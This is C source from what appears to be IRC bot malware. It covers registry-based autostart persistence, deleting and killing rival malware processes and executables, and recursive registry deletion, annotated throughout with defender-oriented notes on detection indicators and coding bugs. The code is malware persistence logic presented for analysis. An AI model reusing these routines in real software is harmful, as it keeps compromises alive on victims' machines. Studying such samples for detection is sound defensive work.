/*
 * removevirus(): walks the `viruses` table (defined elsewhere in this file;
 * each entry carries hkey/subkey/value/file) and, for every entry whose
 * registry value is present, deletes that value and the same-named executable
 * under the system directory.
 *
 * Analyst notes (defender view):
 *  - Observable artifacts: a RegDeleteValue per table entry followed by a
 *    DeleteFile on "<SystemDirectory>\<file>"; both are visible to registry
 *    and file-system auditing and the fixed table makes the sequence a
 *    repeatable behavioural fingerprint.
 *  - The f-prefixed names (fRegOpenKeyEx, fRegQueryValueEx, ...) are not
 *    defined here; they presumably wrap the Win32 registry APIs via
 *    indirection resolved elsewhere in the project - confirm.
 *  - lRet receives the fRegOpenKeyEx result but is never examined, so on an
 *    open failure hkey is used uninitialized by the query, delete and close
 *    calls that follow.
 *  - dwSize is set once before the loop; RegQueryValueEx overwrites the size
 *    it is given with the length of the data it returned, so later
 *    iterations query with whatever the previous iteration left behind.
 *  - sprintf into virusexecuteble[MAX_PATH] is unbounded; whether the combined
 *    path can exceed MAX_PATH depends on the table's file names.
 *  - The function reports nothing to its caller (void, no status).
 */
void removevirus() {
    char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
    unsigned char szDataBuf[128];
    HKEY hkey;
    LONG lRet;
    DWORD dwSize = 128;

    /* Sentinel-terminated table: iteration stops at the first entry with a NULL subkey. */
    for (unsigned int i=0; viruses[i].subkey; i++) {
        lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); /* result unchecked - see header note */
        if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
            fRegDeleteValue(hkey, viruses[i].value);
            //FIXME: Replace the afw kill utils. we dont need to let that loop,
            // when we removed the .exe and the reg key. mayb a static call
            // to KillProcess(); can be inserted here. Something like:
            // KillProcess(viruses[i].file);
            GetSystemDirectory(sysdir, sizeof(sysdir));
            sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file); /* unbounded write; see header note */
            DeleteFile(virusexecuteble);
        }
        fRegCloseKey(hkey); /* called even when the open above failed */
    }
    return;
}
/*
 * AutoStartRegs(): install or remove the run-at-startup registry entries.
 *
 * For every entry of the `autostart` table (defined elsewhere in this file,
 * element type AUTOSTART with hkey/subkey members) the key is created/opened
 * with KEY_ALL_ACCESS and then:
 *   nfilename != NULL -> the REG_SZ value `valuename` (file-scope string
 *                        defined elsewhere) is set to nfilename;
 *   nfilename == NULL -> the value `valuename` is deleted.
 *
 * Analyst notes (defender view):
 *  - This is the persistence routine. The keys in `autostart` are the
 *    detection points: registry write auditing, autoruns diffing and
 *    alerting on a new REG_SZ pointing at a freshly dropped path all catch
 *    it. `valuename` is the same fixed string under every key, which is a
 *    usable indicator once the table and string are recovered.
 *  - The fRegCreateKeyEx return is not checked; on failure `key` is
 *    indeterminate and is still passed to the set/delete and close calls.
 *  - sizeof(autostart) / sizeof(AUTOSTART) only yields the element count if
 *    `autostart` is a real array in this translation unit, not a pointer.
 */
void AutoStartRegs(char *nfilename) {
    HKEY key;

    for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
        /* REG_OPTION_NON_VOLATILE: the key survives reboot. Return value unchecked. */
        fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
        if (nfilename)
            fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
        else
            fRegDeleteValue(key, valuename); /* uninstall path */
        fRegCloseKey(key);
    }
    return;
}
/*
 * RegDelete(): delete a registry value, or a key and (intended) its children.
 *
 *   root    - open root/parent key.
 *   subkey  - key path relative to root; NULL -> returns FALSE immediately.
 *   name    - value to delete under subkey; NULL -> delete the key itself.
 *
 * Returns TRUE only when (a) name is NULL and fRegDeleteKey(root,subkey)
 * succeeds directly, or (b) name is non-NULL and fRegDeleteValue succeeds.
 * Every other path, including the whole enumeration branch, returns FALSE.
 *
 * Analyst notes (defender view):
 *  - Behavioural signal: a burst of RegDeleteKey/RegDeleteValue calls under
 *    one root in a short window; pairs naturally with the persistence and
 *    competitor-removal routines elsewhere in this file.
 *  - The recursive branch calls RegDelete(root, subkey, buf) with the child
 *    key name in the `name` position, i.e. it asks for a VALUE named like the
 *    child under `subkey`, not for the child key, so the recursion as written
 *    does not descend into subkeys.
 *  - The first enumeration call uses inx == 0 and the loop's post-increment
 *    (inx++) yields 0 again on the next call, so the first child is visited
 *    twice before the index advances. `chr` is an in/out length and is never
 *    reset between calls.
 *  - The handle opened in the enumeration branch is not closed (leak); the
 *    trailing fRegDeleteKey(key, subkey) is relative to `key`, not `root`.
 */
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name) {
    HKEY key=NULL;

    if (!subkey)
        return FALSE;

    if (!name) {
        /* Fast path: the key has no children and can be removed outright. */
        if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS)
            return TRUE;

        DWORD inx = 0;
        DWORD chr = 256;
        char buf[256] = {0};
        FILETIME ftm;

        if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS) {
            DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm);
            while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) {
                RegDelete(root,subkey,buf); /* passes child name as `name`, see header note */
                cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm);
            }
            fRegDeleteKey(key,subkey); /* `key` is never closed on this path */
        }
    } else {
        if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS) {
            if (fRegDeleteValue(key,name) == ERROR_SUCCESS) {
                fRegCloseKey(key);
                return TRUE;
            }
            fRegCloseKey(key);
        }
    }
    return FALSE;
}
/*
 * removevirus() - second definition on this page.
 *
 * Same table-driven routine as the earlier removevirus(): for each `viruses`
 * entry whose registry value exists, delete the value, attempt to terminate
 * the named process via listProcesses(), and delete the executable under the
 * system directory. This copy additionally formats IRC-style status lines.
 * Two definitions of the same name cannot coexist in one translation unit;
 * this looks like a later revision pasted beside the original - confirm.
 *
 * Analyst notes (defender view):
 *  - Static strings "[PROC]: Process killed: %s",
 *    "[PROC]: Failed to terminate process: %s" and
 *    "[AV]: Antivirus search complete! " are formatted into sendbuf but never
 *    sent from this function; they remain in the binary and are usable for
 *    signature matching.
 *  - A TCP socket is created with fsocket() and never closed or used here
 *    except as an argument to listProcesses(); one leaked handle per call.
 *  - strcpy(current, viruses[i].file) copies into a 20-byte buffer with no
 *    bound; safe only if every table file name is under 20 characters.
 *  - As in the first version: lRet is never checked (hkey may be used
 *    uninitialized), dwSize is not reset per iteration, and sprintf into
 *    virusexecuteble[MAX_PATH] is unbounded.
 *  - listProcesses() is defined elsewhere; its fourth argument is presumably
 *    the process name to match and a return of 1 presumably means a
 *    termination happened - confirm against its definition.
 */
void removevirus() {
    char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
    unsigned char szDataBuf[128];
    SOCKET sock;
    HKEY hkey;
    char sendbuf[IRCLINE];
    char current[20];
    LONG lRet;

    sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP); /* never closed in this function */
    DWORD dwSize = 128;

    /* Sentinel-terminated table: iteration stops at the first entry with a NULL subkey. */
    for (unsigned int i=0; viruses[i].subkey; i++) {
        lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); /* result unchecked */
        if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
            fRegDeleteValue(hkey, viruses[i].value);
            strcpy(current,viruses[i].file); /* unbounded copy into current[20] */
            //FIXME: Replace the afw kill utils. we dont need to let that loop,
            // when we removed the .exe and the reg key. mayb a static call
            // to KillProcess(); can be inserted here. Something like:
            if(listProcesses(sock,NULL,FALSE,current) == 1)
                sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
            else
                sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
            //KillProcess(viruses[i].file);
            GetSystemDirectory(sysdir, sizeof(sysdir));
            sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
            DeleteFile(virusexecuteble);
        }
        fRegCloseKey(hkey); /* called even when the open above failed */
    }
    /* Final status line is formatted but, within this function, never transmitted. */
    sprintf(sendbuf,"[AV]: Antivirus search complete! ");
    return;
}